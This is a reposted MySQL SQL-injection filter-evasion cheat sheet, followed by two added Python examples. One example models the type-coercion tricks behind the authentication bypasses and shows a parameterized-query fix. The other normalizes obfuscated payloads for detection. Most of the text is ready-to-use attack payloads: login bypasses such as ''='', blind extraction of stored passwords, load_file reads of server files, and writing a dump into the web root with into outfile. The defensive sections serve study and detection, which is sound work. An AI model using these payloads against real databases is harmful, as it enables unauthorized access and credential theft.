Basic filter
Comments
' or 1=1#
' or 1=1-- -
' or 1=1/* (MySQL < 5.1)
' or 1=1;%00
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or-- -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1

Prefixes
+ - ~ !
' or --+2=- -!!!'2

Operators
^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>, <=>, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/
'or+(1)sounds/**/like"1"--%a0-
'union(select(1),table_name,(3)from`information_schema`.`tables`)#

Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a'
SELECT b'1100001'
SELECT _binary'1100001'
SELECT x'61'

Strings without quotes
'abc' = 0x616263

Aliases
select pass as alias from users
select pass aliasalias from users
select pass`alias alias`from users

Typecasting
' or true = '1 # or 1=1
' or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
' or '1 # or true

Compare operator typecasting
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users

Authentication bypass '='
select * from users where name = ''=''
select * from users where false = ''
select * from users where 0 = 0
select * from users where true
select * from users

Authentication bypass '-'
select * from users where name = ''-''
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users

Function filter
General function filtering
ascii (97)
load_file/*foo*/(0x616263)

Strings with functions
'abc' = unhex(616263)
'abc' = char(97,98,99)
hex('a') = 61
ascii('a') = 97
ord('a') = 97
'ABC' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))

Strings extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs

Special characters extracted from gadgets
aes_encrypt(1,12) // 4h±{?"^c×HéE
des_encrypt(1,2) // G/k
@@ft_boolean_syntax // + -><()~*:""&|
@@date_format // %Y-%m-%d
@@innodb_log_group_home_dir // .\

Integer representations
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36
@@new: 0
@@log_bin: 1
!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4
minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)

Extract substrings
substr('abc',1,1) = 'a'
substr('abc' from 1 for 1) = 'a'
substring('abc',1,1) = 'a'
substring('abc' from 1 for 1) = 'a'
mid('abc',1,1) = 'a'
mid('abc' from 1 for 1) = 'a'
lpad('abc',1,space(1)) = 'a'
rpad('abc',1,space(1)) = 'a'
left('abc',1) = 'a'
reverse(right(reverse('abc'),1)) = 'a'
insert(insert('abc',1,0,space(0)),2,222,space(0)) = 'a'
space(0) = trim(version()from(version()))

Search substrings
locate('a','abc')
position('a','abc')
position('a' IN 'abc')
instr('abc','a')
substring_index('ab','b',1)

Cut substrings
length(trim(leading 'a' FROM 'abc'))
length(replace('abc', 'a', ''))

Compare strings
strcmp('a','a')
mod('a','a')
find_in_set('a','a')
field('a','a')
count(concat('a','a'))

String length
length()
bit_length()
char_length()
octet_length()
bit_count()

String case
ucase
lcase
lower
upper
password('a') != password('A')
old_password('a') != old_password('A')
md5('a') != md5('A')
sha('a') != sha('A')
aes_encrypt('a') != aes_encrypt('A')
des_encrypt('a') != des_encrypt('A')

Keyword filter
Connected keyword filtering
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0'union all select all`table_name`foo from`information_schema`. `tables`

OR, AND
'||1='1
'&&1='1
'='
'-'

OR, AND, UNION
' and (select pass from users limit 1)='secret

OR, AND, UNION, LIMIT
' and (select pass from users where id =1)='a

OR, AND, UNION, LIMIT, WHERE
' and (select pass from users group by id having id = 1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP
' and length((select pass from users having substr(pass,1,1)='a'))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
' and (select substr(group_concat(pass),1,1) from users)='a
' and substr((select max(pass) from users),1,1)='a
' and substr((select max(replace(pass,'lastpw','')) from users),1,1)='a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)='a
'='' into outfile '/var/www/dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
' procedure analyse()#
'-if(name='Admin',1,0)#
'-if(if(name='Admin',1,0),if(substr(pass,1,1)='a',1,0),0)#

Control flow
case 'a' when 'a' then 1 [else 0] end
case when 'a'='a' then 1 [else 0] end
if('a'='a',1,0)
ifnull(nullif('a','a'),1)

Note: reposted from https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
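The "Compare operator typecasting" and both "Authentication bypass" walk-throughs above work because MySQL, when one side of `=` is a number, converts the other side from string to number instead of comparing text. The Python below is an added example and not part of the cheat sheet: it models that conversion with a simplified leading-numeric-prefix rule (an assumption for illustration, not the server's conversion code), replays the two derivations over a constructed list of usernames, and then shows the countermeasure, a parameterized query. The parameterized part runs against an in-memory SQLite table only to show that a bound parameter is compared as the literal string the user typed; it does not claim SQLite shares MySQL's comparison semantics.

```python
import re
import sqlite3

# Simplified model of MySQL's implicit string-to-number coercion (an
# assumption of this example, not a reimplementation of the server): the
# longest leading numeric prefix is used, and a string with no numeric
# prefix becomes 0. This is what makes '' = 0 and 'c' = 0 evaluate true,
# and what makes version() compare equal to 5.1 on a 5.1.x server.
_NUM_PREFIX = re.compile(r"^\s*[+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?")


def to_number(value):
    """Coerce an operand to a float the way an untyped MySQL comparison does."""
    if isinstance(value, (int, float)):
        return float(value)
    m = _NUM_PREFIX.match(value)
    return float(m.group(0)) if m else 0.0


def mysql_eq(left, right):
    """MySQL '=': string compare only when both sides are strings,
    otherwise both sides are coerced to numbers. Returns 1 or 0."""
    if isinstance(left, str) and isinstance(right, str):
        return 1 if left == right else 0
    return 1 if to_number(left) == to_number(right) else 0


def chained_eq(operands):
    """Evaluate a = b = c left to right, as MySQL parses it: (a = b) = c."""
    result = operands[0]
    for operand in operands[1:]:
        result = mysql_eq(result, operand)
    return result


def where_eq_eq(name):
    """WHERE name = '' = ''  (the '=' bypass): (name = '') is 0, and 0 = '' is true."""
    return chained_eq([name, "", ""])


def where_eq_minus(name):
    """WHERE name = '' - ''  (the '-' bypass): '' - '' is numeric 0 - 0, so the
    comparison becomes name = 0, and a non-numeric name coerces to 0."""
    return mysql_eq(name, to_number("") - to_number(""))


# Constructed sample usernames for the walk-through.
USERS = ["admin", "alice", "bob"]


def rows_matched(predicate):
    """Rows a string-concatenated WHERE clause would return under the model."""
    return [u for u in USERS if predicate(u) == 1]


def parameterized_lookup(user_input):
    """The fix: a bound parameter is data and is never re-parsed as SQL, so the
    comparison stays a plain string compare and the text ''='' matches no user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)", [(u,) for u in USERS])
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (user_input,)).fetchall()
    conn.close()
    return [r[0] for r in rows]


if __name__ == "__main__":
    print("'a'='b'='c'        ->", chained_eq(["a", "b", "c"]))
    print("version() as 5.1   ->", to_number("5.1.52-log"))
    print("name = ''=''       ->", rows_matched(where_eq_eq))
    print("name = ''-''       ->", rows_matched(where_eq_minus))
    print("parameterized      ->", parameterized_lookup("''=''"))
```

Under the model every row satisfies both injected predicates, exactly as the derivations above end in `select * from users`; the parameterized query returns nothing for the same input because the database never sees an operator, only a string.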
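The "Comments", "Whitespaces" and "Connected keyword filtering" sections above list the separators and comment forms that let a query body slip past a filter looking for the literal text `union select`. The Python below is an added example, not from the cheat sheet, showing the canonicalization a detection layer has to run before keyword matching: percent-decoding as latin-1 so `%a0` survives as one byte, inlining `/*!...*/` versioned comments, dropping other comments, and treating parentheses and backticks as token breaks. It then applies the same keyword rule before and after canonicalization to the four payload shapes quoted from the page. The sample inputs are constructed from those lines, and the regular expressions are this example's own and cover only the forms the page lists.

```python
import re
from urllib.parse import unquote

# Constructed test inputs, taken from the cheat sheet's connected-keyword
# filtering section, used here only as detection test data.
SAMPLES = [
    "(0)union(select(table_name),column_name,...",
    "0/**/union/*!50000select*/table_name`foo`/**/...",
    "0%a0union%a0select%09group_concat(table_name)....",
    "0'union all select all`table_name`foo from`information_schema`. `tables`",
]

# Whitespace bytes MySQL accepts between tokens (the Whitespaces section),
# plus the ordinary space.
_WS = r"[ \t\n\x0b\x0c\r\xa0]+"
_VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # /*!50000select*/ -> select
_BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)             # /**/ -> separator
_LINE_COMMENT = re.compile(r"(?:#|-- )[^\n]*\n?")           # '# ...' up to the newline
_SEPARATORS = re.compile(r"[()`]")                          # (...) and `...` break tokens


def normalize(raw):
    """Canonicalize one input before any keyword rule is applied."""
    s = unquote(raw, encoding="latin-1", errors="replace")  # %a0 -> '\xa0', %09 -> '\t'
    s = _VERSIONED_COMMENT.sub(r" \1 ", s)  # MySQL executes the body of /*!...*/
    s = _BLOCK_COMMENT.sub(" ", s)          # every other comment is just a gap
    s = _LINE_COMMENT.sub(" ", s)           # '# ...\n' also ends at the newline
    s = _SEPARATORS.sub(" ", s)
    s = re.sub(_WS, " ", s)
    return s.strip().lower()


def naive_filter_blocks(raw):
    """A literal-substring blacklist of the kind the cheat sheet defeats."""
    return "union select" in raw.lower()


def normalized_filter_blocks(raw):
    """The same idea after canonicalization: 'union [all] select' as whole
    words with any amount of (now uniform) separation between them."""
    return re.search(r"\bunion\s+(?:all\s+)?select\b", normalize(raw)) is not None


def compare(samples=SAMPLES):
    """Return (hits of the literal rule, hits of the normalized rule)."""
    naive = sum(naive_filter_blocks(s) for s in samples)
    canon = sum(normalized_filter_blocks(s) for s in samples)
    return naive, canon


if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", repr(normalize(s)))
    print("literal rule hits / normalized rule hits:", compare())
```

The literal rule misses all four shapes while the normalized rule catches them, which is the practical lesson of this section for anyone maintaining a filter: the server's tokenizer, not the raw bytes, decides what a query says, so a filter that does not reproduce the tokenizer's view of comments and separators is checking a different string than the one that executes. Canonicalization narrows the gap but does not close it; the durable fix remains not building queries from strings in the first place.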